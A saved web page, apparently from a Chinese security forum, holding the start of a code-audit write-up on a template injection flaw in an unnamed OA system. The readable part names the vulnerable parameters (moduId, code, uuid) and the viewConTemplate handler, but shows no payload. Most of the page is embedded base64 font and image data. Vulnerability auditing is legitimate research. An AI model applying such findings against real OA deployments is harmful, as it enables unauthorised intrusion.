* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
*/@font-face{font-family:"FontAwesome";src:url(data:font/woff2;base64,d09GMgABAAAAAN3MAA4AAAAB3OQAAN1sAAQAxQAAAAAAAAAAAAAAAAAAAAAAAAAAP0ZGVE0cGh4GYACFQhEICobjZIW0WgE2AiQDkSoLiFwABCAFhwAHqx4/d2ViZgZbBYBxhnF7IVHRnVDqt/fSG4cZBbodREHF77duhex8Mb6j/fmp2f///78gWYzh7g+8R0BUdTpLW1Uzsp76hCzI4aYUR8pes2MocNQ2YvKKbApmLWu/bv7ALkc1B+aeVCsz1YrjaYsVnkxwJujIZWwn5gjVfIgmhc3in0QhmV5maXZNM1xTKb1RmAdM/OaNTl/mtoIrW/khyLhT5xe7bVH4fZGXVpFvuchr9JDG3Mcoh7mswgQxQVK8XUETf1CxbfHOtB+kxeznYk7Tc0VQvAs3ZHw4fkX+eKbZae3Ga4yTuqW4ivdfEynv1GrGUEu4OnTzzcjOrvA9euKJJn93ZAnl2I4SDS0d71OE52stez2NiwEECTzlA0CWsDwIHxnjUh747oQ+4/cPz8+ttyIXzTZiY4wxosaI3F8QvVEho0JSWt0kWiUlDEAMbFRUsJgZKGcUGHVmnTf/P6e9Zz8P5jE8wRUMwwiRViAUd39KoXMKlV2UsWpdN25qBwAP0n35Mpmf+bvg9ZtKfIuWauEin8QFPnQhqjHdubkgORdjw60F1Hm3BRSOpS8r3c6XU/9/JMdJqrGKafqQYMBQSgy6BEkN2ozu0jp/p5EMSdFJDElKASzB5dwOFDbt5x1Rt2WVqTHYdx+5Xp9Ufm9KBtkmlgURoo8tj////Z9a0ixLyWLsAGIB+Eoqp6lnC5QCOfox/PnFQ4BJkcOC2NkzE2qySKkd7EB0X2SssjuTJ374/zn7zhne2jm7fiUkyEiwBGin9SnjfqWFGqXyrNPtdoTk/iS7nvwSR9pOTPBCIAlSpUo50teOPKprzxRrm9+ChuQfqzJE8Bbl26JpGFbqfrX84LxQBx3aIebKK51pt3LCe3dPaIcrAGrDFXAd7qRJJ7W7e7L0z7L00hPYSSrgWlB0qYKDoXOBwQPRquJvWcPzc+sBI3pUj9GjxgIGG+yvAlaMBaxgY2PUYERvgIiAEiaIJ1NUPDFQwcLAujTqTr1QLioZ3GbIHTEdYnpCesfDy9dvB4B4+Vba/vPP6au23oy0eHeVXxgzGuGtTG1zt4lDgpCDCDHInDqlDmgAeK+jJZIEuJ9bmCpbL8Z0vvFwr84+jRRnNzOSkyPg6srryLIDS/CREjejVnMMEDioCIrqv3XCmO6lA/N4Lf1ua0oVVekIinqBkbCY5N/3nRqiAWisW2xsNBbsUxu11kXxz8lWB4c3sN3ekYiAEGAAByO382+qZQuQxImXstYh60J3LrpdOaX23OWinx9mwP//fAAzA5CcGYAkAFIiAEriDAiJAMndAQjqAJCgKWrvHpebtWs/re72nVaXEjCgtAQp6RHUJspJ2gupsq9yyLHo/Vy5u+v8rqhclS5d2qVdtLX/3nRVKsauMS47Z4JoNru6yNjUBvn73WqpW0jQLWxLIxDCSgwlBzcSzMxJwozQOiGBVpiZtY7hnPstYGiNbWEF5wTrxFmYdcxak56xPgku3HDDS8ILnYkuDi8MnQvCI3jcT216ZaMrjPl5GWYAIByhr51xVXZju0G5EtXIfqYwq7s4NLhgeu2nvYsxpRohhSTYCoItYM27+X/m/PxE6+tJNw9faWYRRohBDMIYh3z8h1yy6QEzqRlrM0ghSOsQ+ShkO2LOCgqadP5MQjyDih2k2EHqttndgXsdI1Oga0jEvEe50TXItrpN9NIEBcQhscEo44wiaoTxcU2AAvxdwsQC+Ppw/kum+fD5u8BrSYNSgIiihg2AMccnArqsYJ2gmNlhnADg/vHOjV6AesO+/MmrlN8grD8CAnD8ERERq2e4xrw61HwHQX8hVkPGCIADEJRmLCNsYzeTnAWcZnbH7osIzSEbGYvULv/7qJdPYalrqK/xvNrG/vmB3hmw4yOMWoM+4zyt158PeG80n4NP5BkGyRJu62dDPTINSpg2S/aEQH1fYmH9GoDFAURIy8JOAPQ+olD/RszU+DcQnfyXjKqKpWkxC3B+cn7qu+8P/zw8HGWmGhXmmMGhgEUOgwwppiB4OIEDmIPxlOSe+zqPfVuXeRqHvhveVZsW/nw1V6A6M4KhLcWhuFu/4O3fRKWuHfUc9G7G94SL4vR/rZ8Ub5iZP5cz9tlk/wtG9+s3PxmuMdIjm1qu7k+tQYQCZTRkuAtSmLSs0uOxI64zaboh3cTIf720EgwvjBKMYQmjxBNnkRyxseNc0nKZeZURGC+VioZVLFpliSPBSR6sepFcJRcWptiE61cRFstAMUgzXiIy9GFHp+YbdyPuTxi7mhkEy8HFEDtgQNiOpK3nWM1fDipB52FSVfCgaWZDZnBCmAEeY8qnhJXDtZpO3WARXEKSWONEF/OsMAUcncfXXJFOO07iwB9ZEC0Rx0w1XBF7LMNQps6RTRBgUkR4wysExmnkzVyanU2yQYoszPOCt7CyWSNhx2qJx6pQUFg9hF2rc4J4PRPD0s0/9mU9Xqti6iyt5m0wwu0LiQ7ss4x0xMnZYuElJ+YetZyQxFx641j/Yal5weLc8H/4fYKnutlzOe9R93rRMaSyJxXDwDOMtpVPhX8gHQkPZmFUmIukZ5itm4mgwdiCoXPLPt00dun4zJgyQ9WC7G9fKMSWv+rce6CmkNdcMj+29sKV6uuvzwGeYccKULEvDBbrFO98vT95Kr/X7EtB7aHcN4I8HwSyFyfYSQs5dWoQETxfhzg8XPRHDn4aAy4I0jgMd/YKhhTQGIIUaXr2SIGtQ7a8shpQ3Kd5HJl3uSm6jiggOo0lmJgU7BnW+tsbN8Ytnz/NF85mdb1xJBbSr53bKHWNFTs3NfjC7NyZs68AVT/AmfztCK2JuKyYoe3JQOL1Ez4+e4nP3Tznw51cp8n/f29xXJIeDFoytH2UdswpLxZj5TQ/jKFp0HleHN6iBgbGIDNIoG0AbzSe+hYvI/CmIZ9/+tzFx4LT+VwmKJiHptTdPu9IqvO/cQB4Z8WYj9vFB3NNh/CqqTs3L8sqbfk18wPSsZY1c3ac68eisCvjt+6GslRjWA1Zxq+qdEAqc7sJOkCYAQZdZAG6Znb2s8hRfrlyeWqbnEMQ6RI2UMe1AQiF2QdBy28lB0y3Y9QUnneWbXwuEZlXIjGOWtQT75f9QOantcglVhUBA9/nscgFUqkPfpE3sEQNV0z5MgnVbqu6yqG0r1FihEcFynAafHXrm5sP+HRIVMrrc83SlwaAHpUNNtGUAG/NorLNojJrBbedljpgk7Y8n6QG7/0NlwJtE+j0URxOmtVfeGtPSSRmNoSRyVr0HTRbX6Vk74l5MrdxqLL/wsT+m8xKkTi52Q2Vbxac4ZGt4Arfhrgb/AND4tFY3Xm/Toh0KeIA86aziD28hvsDsGZM3xLKLrjCGsjCSanjTV/lp53WIUI5X7DkOtim0kaMQABwbaw1JvjjCooVnahJrl2NbeOlHmQesdeWcDDm151Uw4itkyRyhHa+o8AqzpAolQfERlyYrXU8TcoyZc3bc2TTc9bOxCSFlgOR+CCm78ShGPMgUNHUVT+NGMgx9p5S8ojoislOGDXJ/HWbpevnAhZjcJG83YRHZrg4cCyLbyfJZI3zAA43Mui7Z//EogzN/udIIqnSdh6czyF/f34cAaTNOCJtklgk8XEIm2roZAY9panWtZblERHrIhdamihzQ9G2dGx+KoTBSBdtWsddqEJaROCI9aSpbRbbKkm2iJSmPo9YyQRe6KnaxDO5/G4Kofm8n6jc6PLyujtlEPm9TWjKBUTWEmENgIcjSPJu8Kez/W0AQSD+uunlV58AGIOEAnOKGdJJPzDL9PHxvFpS0+BkDk/hBSfK9wOjj9+TiDzPD9nA03EcaR0V+XC5e98nuyq4N5VTHJYHXyrmvTNVz2v8PaVPXoRE184+h7lQcjXseY0bfJd/5ctB
<style>.highlight .k{color:#204a87;font-weight:bold}.highlight .n{color:#000000}.highlight .o{color:#ce5c00;font-weight:bold}.highlight .s{color:#4e9a06}.highlight .na{color:#c4a000}</style>
<style>@-webkit-keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@media (max-width:800px){}</style>
<!--[if lte IE 8]>
<script src="http://code.jquery.com/jquery-1.11.3.min.js"></script>
<![endif]-->
<!--[if !IE]> -->
<style>#waf_nc_block{position:fixed;width:100%;height:100%;top:0;bottom:0;left:0;z-index:99999}</style><style data-id=immersive-translate-input-injected-css>@-webkit-keyframes immersive-translate-loading-animation{from{-webkit-transform:rotate(0deg)}to{-webkit-transform:rotate(359deg)}}@keyframes immersive-translate-loading-animation{from{transform:rotate(0deg)}to{transform:rotate(359deg)}}@keyframes immersiveTranslateShadowRolling{0%{box-shadow:0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}12%{box-shadow:100px 0 var(--loading-color),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}25%{box-shadow:110px 0 var(--loading-color),100px 0 var(--loading-color),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}36%{box-shadow:120px 0 var(--loading-color),110px 0 var(--loading-color),100px 0 var(--loading-color),0px 0 rgba(255,255,255,0)}50%{box-shadow:130px 0 var(--loading-color),120px 0 var(--loading-color),110px 0 var(--loading-color),100px 0 var(--loading-color)}62%{box-shadow:200px 0 rgba(255,255,255,0),130px 0 var(--loading-color),120px 0 var(--loading-color),110px 0 var(--loading-color)}75%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),130px 0 var(--loading-color),120px 0 var(--loading-color)}87%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),130px 0 var(--loading-color)}100%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0)}}@media screen and (max-width:768px){}@media screen and (max-width:768px){}</style><meta name=referrer content=no-referrer><link rel=icon href="data:image/x-icon;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAMAAABEpIrGAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAADDUExURUxpcVVVVUNDVT5CTz1BUEBVVT1BUD1BTz5CTz5GT0BDUVVVVT5CTz5BUj1CTz5BT05OYj1CUD5GVUJCUj5CUD5BTz5BT0lJbT5CUEJCVT9DUUBHVT5CUD5CTz9CUD5BTz1BTz5CUEREUz5CUD5BUD5DTz5CUD5BT0BDUT5CTz1CUD5EUUBgYEBDUT5CUT1CTz1BUD5BUD9DUT1CT0REVT5BUENDUT1BUEBGUz1BUD9DT0FBUz1CTz5BTz1CUD1BUD1BT5JdbS4AAABAdFJOUwAJKr76DPbywR1MBuRO5fsNsyEfvdtKB4MbfiTa+FnegYwitbBXfPdYrt0pCEiL9XmsRdgeVhO8KI2KK45a2b/ePQx7AAAAwUlEQVQ4y4XTxw7CQAwE0A2E0BN67733Xv3/X4U0kYgimKxP9vgdfNhVildaBVfmpQGPaPD+7mjAW74g5q8Ewqd4QHy1T+JCm4IdsqswsEUUchhYHxCFhYENkpYw0MCFEZuCJYKuMDB1LzQZsPLehX/BCONEGCiWcWGKghKmlTAwwDA3GbByGArCQA39UBiYLfwX/gD3mdyEgSy6i8nAuIfuLAx00ByFgbaB5hT3VdUDmk8mfc0fa9Y1oKLZKyNo+QEJQV3gLnHrKwAAAABJRU5ErkJggg==" type=image/x-icon><style>.sf-hidden{display:none!important}</style><link rel=canonical href="https://xz.aliyun.com/t/15826?time__1311=GqjxnDgDyDuGi%3DD%2FD0ex2ADRQiuwZh2igbD"><meta http-equiv=content-security-policy content="default-src 'none'; font-src 'self' data:; img-src 'self' data:; style-src 'unsafe-inline'; media-src 'self' data:; script-src 'unsafe-inline' data:; object-src 'self' data:; frame-src 'self' data:;"><style>img[src="data:,"],source[src="data:,"]{display:none!important}</style></head>
<body>
<div class="navbar navbar-default">
<div class=navbar-inner>
<div class=container style=text-align:center;position:relative>
<!--[if lte IE 8]>
<span style="display:inline-block;margin:0 auto;color:red;">为了更好的体验请使用IE10及以上版本</span>
<![endif]-->
<div class=brand-box>
<a class=brand href=https://xz.aliyun.com/tab/1></a>
</div>
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F15826&amp;from_type=xianzhi" class="pull-right anonymous-user hh_loding sf-hidden">
登录</a>
<div class="nav-collapse collapse">
<div class="search d1 text-right">
<form action=/search>
<input type=text placeholder=搜索 name=keyword value>
</form>
</div>
</div>
</div>
</div>
</div>
<div id=Wrapper class=container>
<div class=row2>
<div class=span10>
<div class="row box content" width="1200px !important" style=width:1200px>
<div class=box-container>
<div class=main-topic>
<div class="clearfix user-info topic-list">
<p><span class=content-title>某OA代码审计</span>
</p>
<div class=topic-info>
<span class=info-left>
<a href=https://xz.aliyun.com/u/75638>
<span class="username cell"> nnosuger</span></a> <span class=i-seprator> / </span>
<span> 2024-10-11 18:26:12</span><span class=i-seprator> / </span>
<span>发表于四川 / </span>
<span>浏览数 20</span>
<span class=content-node>
<span class="label label-default label-node-first">
<a href=https://xz.aliyun.com/tab/1>技术文章</a></span>
<span class="label label-default">
<a href=https://xz.aliyun.com/node/11>技术文章</a></span>
</span>
</span>
<span class="pull-right t-vote cell info-right"><a class="vote vote-up" href=javascript:void(0)>
顶(0)</a>
<a class="vote vote-down" href=javascript:void(0)>
踩(0)</a></span>
</div>
</div>
<hr>
<div id=topic_content class="topic-content markdown-body">
<p>此OA听过但从来没有去研究过所以简单分析研究一下发现此OA并不复杂且因为闭源的原因所以分析起来比较轻松。</p>
<h1 id=toc-0>模板注入</h1>
<p>查看JSP文件通过Template名字或者一些代码信息能够发现是以模板的形式进行参数传递并且对路径需要的传参也给出来了分别为<strong>moduId,code,uuid</strong></p>
<p><a id=img0 href=https://xzfile.aliyuncs.com/media/upload/picture/20241011181946-56b4ddca-87ba-1.png><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAB8cAAAOSCAYAAADpldGcAAEAAElEQVR4nOz9Z3BcaZrg+/3T+4RJg0TCexAgDL0vlu1yXd3TdrzfnZjVbNy7cWVCWmn1RQop4mqke6UNzdW9M9szOzM9pmfad5djVbGKnqADARDeAwmk996cow8gsgh6WySr319ERXQjj89z3kzm8z7Po2hqapIRBEEQBEEQBEEQBEEQBEEQBEEQBEEQhC8x5dM+AEEQBEEQBEEQBEEQBEEQBEEQBEEQBEF40kRwXBAEQRAEQRAEQRAEQRAEQRAEQRAEQfjSE8FxQRAEQRAEQRAEQRAEQRAEQRAEQRAE4UtP/bQPQBAEQRAEQRAEQRAEQRAE4Xkjy/JDradQKB7zkQiCIAiCIAj3SwTHBUEQBEEQBEEQBEEQBEEQHoPNgPnNgfMb/79arcZkMmE2m9FoNOW/RyIRUqnUF3OggiAIgiAIv6JEcFwQBEEQBEEQBEEQBEEQBOEJuDlYLssysiyj0WjQ6/XodLrysslkUmSVC4IgCIIgPGGi57ggCIIgCIIgCIIgCIIgCMJjcrescUEQBEEQBOHpEsFxQRAEQRAEQRAEQRAEQRAEQRAEQRAE4UtPlFUXBEEQBEEQBEEQBEEQBEF4AA+aHf48ZI8rlUp0Oh0ajQa1WvxsLAiC8GUjSRKlUolsNkuxWHwuPpsE4UkQ33KeK7XUNNTQ1F6FAVBSIhfzEV2ZYj4C2SKgNUNVC72NVqyyj7hvluk1KJQAdKjU1bT0NmGvMGBQXd9sMU5odR3PwhoRQHpapycIwiNSAVXUdzTgclkxkSW+PMaqXEXBUsegw4CimCDkWWN1YZ0ov4rPuxqooqGzAVe1Ck3Gz9XpdVKZPAZrNe7OfpyaBMl1D55FLxHgmfmKaKpE5e5gwGGgQqf6/O+ZAKtrXmaWg0/v2HBic7lo7bSijS+zsBJkLZR+iscj/OpQAlW4W+upravEoiwSXx7FUzSRNjcw4DCgkVNE1r2szq4SAUr2BqpddQw4DBubKGXIxIIsXVsgXCyRA5RqLZUt26mzaTGlQwRGZlgDMk/vRAVBEARBEITnzJ0CDps9x59FOp0OvV6PWq1GqRQFRwVBEL5sZFlGkjZ+Ec5msxQKhad8RILwdIjg+HNEZ9xB/779vP2tFgypHHq9mvTSReaOLfF3F3Nkk0pU5loMg9/gq1+poy5zgvETsywFoFDSoNa4qHIO8MqvvURnXQVWRQkANQFmTp7lZDDKcDJDSpZ/BQNmv3oUShVqgxm9WkZRyJNPZ8nx7AQClSo1OqMFrbJIKZ8nl8khPqrvRQe0sePoVzn6Yif1coDZn/z3/KKwnWTbG/y7g25UqWkuvvsRv1hYJ8FNwXGNAb1Oi04lIecTpHNQfFYGA4UCjcGMTqNEVcqTT2bI8RDBfYUe1N3sfuVNDveqMSyfYGU9QiqTp8rVyOHf+PccsMyy9PGHvL/oJQH3dd8plErUejN6jQJFMU8+lXn8z1OlC83uN3l9l5PWCiMqtRaDSY86cIEPP/70KQfHu2jZdpTf/JMOKqd/zD//4sKvfHBcbTCj06hQy0UKyRQ5GUpP+6C+lDRAM9sPvMWrb2ynRZtk9qf/Pe/H61hp/hp/fLAWS2GJkU+O87NZD0l0qDv3se3oC/xpr4F0ToeKGAnPKO+t/R0Xwhl8shqN1UH3q9/l5R4NjpWLnByZIYEIjguCIAiCIAhfXkqlEoPBgEqlQpIkisXi0z4kQRAE4QlQq9UYDAZKpZIIjgu/skRw/Dmy881t7OjTIF37kP/3v56j/YVvsKO9gdZdR9FNnIWkmZrqHt56rZ0m1TSjY0v861lI5wB6aOs9wNd+t5eG1AXO/HSC0yNeANpe+w0GWvfx9h/qUfzNu1yLpwg91TMVvgj6ahedb/4hL7aV0I5fYvgHH3IWSD7tA7uuyt3MgW//KYMWD74L5zj13llmAPFPs4eQyCGFs2QBfSZOMJdilpuupUoL7W/wwsEeDtZFSIz8//jRWYkF39M55JtpjFY63vwjjnQbsa9f4+p/+Qln4cHHKr0eOnuorjGhjs+wcPkEufSj3/U6q532N/+Qox0qzPPDDP/9u5wF4o+85Rv4F8i9/7/wvRNqtEo3rqYB3vz9V2gRD8UzR6FS0/rKb3Jgew0tmXmu/s//yrlsnvWnfWC/SlJ55FCGnAzGbJxINsEUOnIc4GhTL4drgqyd/Rv+9cwBXP0DHNzfwK6XVCyeBl+2Fd32r3C404k9foyZyff5iGfn81EQBEEQBEEQnhS1Wr0lq1AQBEH48ikWi+h0OlEhRPiVJoLjzwU9UEtNrY0qU47C3BKelSU0gQTNrfW0OBto0FxC1dZG0/4BBmszxN69xMLQDMGEBnCxbe9O9u12UV+8xunTl7gwssTK+sbPvKlT17Ac3kVDfz8Hjk4TuThHaF38BPxlp9JoMdrrcNUV0flmWWCjKPezQqPTU+VqxF1ZQp4xX28lcBt13dS0b+O1RgsqpeIeWy2Ri60THPuU4bUSwS9dYmseWCKdS5DOFpDUSRIrJbJZGdzSRhazVKIoS2RvXlWhBEMVFQ439XVaoisK9Jov/ATuSKlSY6h24XSbcRXXWOLhPsAMJj1dO9qoq5DILQeYvhYne8vFeIjjU2sw2tzU1KmoiC+y+JDHd1eFHHLEiy8CoETWt5Ap/SqWxn/2KRQK9JVO7O466lNxVpRKtI9zB5VNVDZu46XtdvCdZmF+geGFGxfY+N6w42gfTbYSpaCHY+cTtA520NZWQ/X9PNtJD/ML85wcXobanfR31bO9wYIauN1Im4svEF08wblpiKYe5eQs6E317HixD3eVAfONH0zFOHHfKqOfXma9WGJjN0VghUwuRjJbRNYkSXpKZEMy2D8f90qyREalgto6HDVWHAov4cUV1pbdKOpbySldOOuaMBjT1FZ0snt/N83qdSYmFvl0OEL0UU5JEARBEARBEJ4TCoXimS35LgiCIDw+CoUCheJev6ULwpfXMxscV+qs6AxGzPobfhWVS1DKkoglyRWKz0z558fNoFBhV2lwqUoki0X8JRUhTKhUKpRISNJGqYuiJFGUFSg0OgwVDbR29LCt34E1dpELV0aZn/eB2gK27fTub6PHnSZx9lNODy2yGvk8GhSeHmOhtoaO/v307mrl/EoARHBceF4YzOjstTQ0VKNSAujR6KzUNtdgUaZJxSIsroWvL1wkayyiWFSge5ZmAjw2RcBLrpAhWyiBMkvaL1PIFJCa8+QATTGHVMw/7QN9SsyY9G52djtxaBZZDwSYXIfc0z4sQXhQFjfWzsO88mY78uQSp3O3C47X0737Rfa3FSjOXuDklVksVU5c9Q3UbEbqKxxYqu20VajJBBYJRhKUq+HH8sTCXlBqoGY7XXt38fqACWV0Dk9IJnnTpJJsOIE2CupHGlurqLC10d4zwEtHe9FJOQrJFBvheBs2m4w6t4I1FGdobpXFeIoMJcBPrpgim5eADJmARD5QRKrLkZdkCpvjnlIBBjVKjQKlJFMqgCwXkKUikqxErTZidjXQbu/mSIcGafQK48MexpY/P0JTlQOb00WFOk1k1Uc4luRLN89KEARBEARBeKxEsFkQBEEQBOHZ8swGx7W2TtxN7fQ2GD7/YzEFmVVGLk6wHoh8aQMabo2eN8zVfMeQYjSe5KeJFB8xRiyVICtbsJjsKJQqKg1aKtUlipkUs62vsreniQGLH9+5v+JsVGYawGyEF3ZT06xDuzzOpZ9M3uZH3GVCyRVm/HvYXuFApTV94ecsCA9t9iLLsxf5v5f/4KbatZvf+l9/gz79PNNDJ/h//t1nT/EAv3iyLG/9z5eiMB8lKssoUiEK2cda7Ps50oxOs5/GGg3awAr+8ApTT/uQBOELkQMmOf/+MOffv+HPu96m76Wv8H/eX8na2b/n2OlRPpq7
通过搜索<strong>viewConTemplate</strong>定位后端处理该消息的代码</p>
<p><a id=img1 href=https://xzfile.aliyuncs.com/media/upload/picture/20241011181954-5c0f58cc-87ba-1.png><img src="data:image/png;base64,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
